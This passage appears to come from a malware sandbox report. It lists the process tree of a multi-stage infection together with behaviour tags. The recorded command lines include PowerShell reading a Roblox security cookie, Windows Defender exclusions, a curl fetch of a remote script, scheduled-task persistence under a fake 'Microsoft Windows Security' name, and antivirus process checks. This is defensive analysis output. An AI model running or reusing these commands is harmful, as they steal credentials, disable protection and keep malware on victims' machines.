C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption5⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE" && pause5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\backdoor.exeC:\Users\Admin\AppData\Local\Temp\Files\backdoor.exe4⤵
- Executes dropped EXE
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exeC:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exeC:\Users\Admin\AppData\Local\Temp\Files\XClient.exe4⤵
- Drops startup file
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'5⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'6⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'6⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'5⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'6⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exeC:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe"3⤵
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\BACKD0~1.EXE4⤵
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\1188%E~1.EXE4⤵
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\test11.exeC:\Users\Admin\AppData\Local\Temp\Files\test11.exe4⤵
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exeC:\Users\Admin\AppData\Local\Temp\Files\3546345.exe4⤵
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\loader.exeC:\Users\Admin\AppData\Local\Temp\Files\loader.exe4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "payload.bat"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_PointingDevice get PNPDeviceID /value7⤵
-
-
C:\Windows\system32\find.exefind "PNPDeviceID"7⤵
-
-
-
C:\Windows\system32\curl.execurl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exepython-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=06⤵
-
C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe"C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=572 -burn.filehandle.self=724 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=07⤵
-
C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe"C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{DD8DBF4A-4DF9-4D20-A26B-E7B742651D29} {5C8DA92E-CA20-43A2-9F21-ED3F3CF16F12} 32448⤵
-
-
-
-
C:\Windows\system32\curl.execurl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure6⤵
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE4⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /k copy Emotions Emotions.cmd & Emotions.cmd & exit6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"7⤵
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"7⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3695807⤵
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "MaskBathroomsCompoundInjection" Participants7⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\369580\Origin.pif369580\Origin.pif 369580\Z7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\Admin\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 157⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exeC:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"5⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"5⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 3325⤵
- Program crash
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXEC:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE4⤵
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\System.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\System.exeC:\Users\Admin\AppData\Local\Temp\Files\System.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"5⤵
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate5⤵
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exeC:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe4⤵
-
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe" -service -lunch1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SYSTEM32\rundll32.exerundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run3⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXEC:\Users\Admin\AppData\Local\Temp\100006~1\STEALC~1.EXE3⤵
- Loads dropped DLL
- Checks processor information in registry
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exeC:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe"4⤵
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE"2⤵
-
C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXEC:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exeC:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe3⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe5⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"6⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe7⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"8⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe9⤵
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"10⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe11⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"12⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe13⤵
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"14⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe15⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"16⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe17⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe19⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"20⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe21⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe23⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"24⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe25⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"26⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe27⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe29⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"30⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe31⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"32⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe33⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"34⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe35⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"36⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe37⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"38⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe39⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe41⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"42⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe43⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"44⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe45⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"46⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe47⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"48⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe49⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exeC:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe51⤵
- Checks computer location settings
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"52⤵
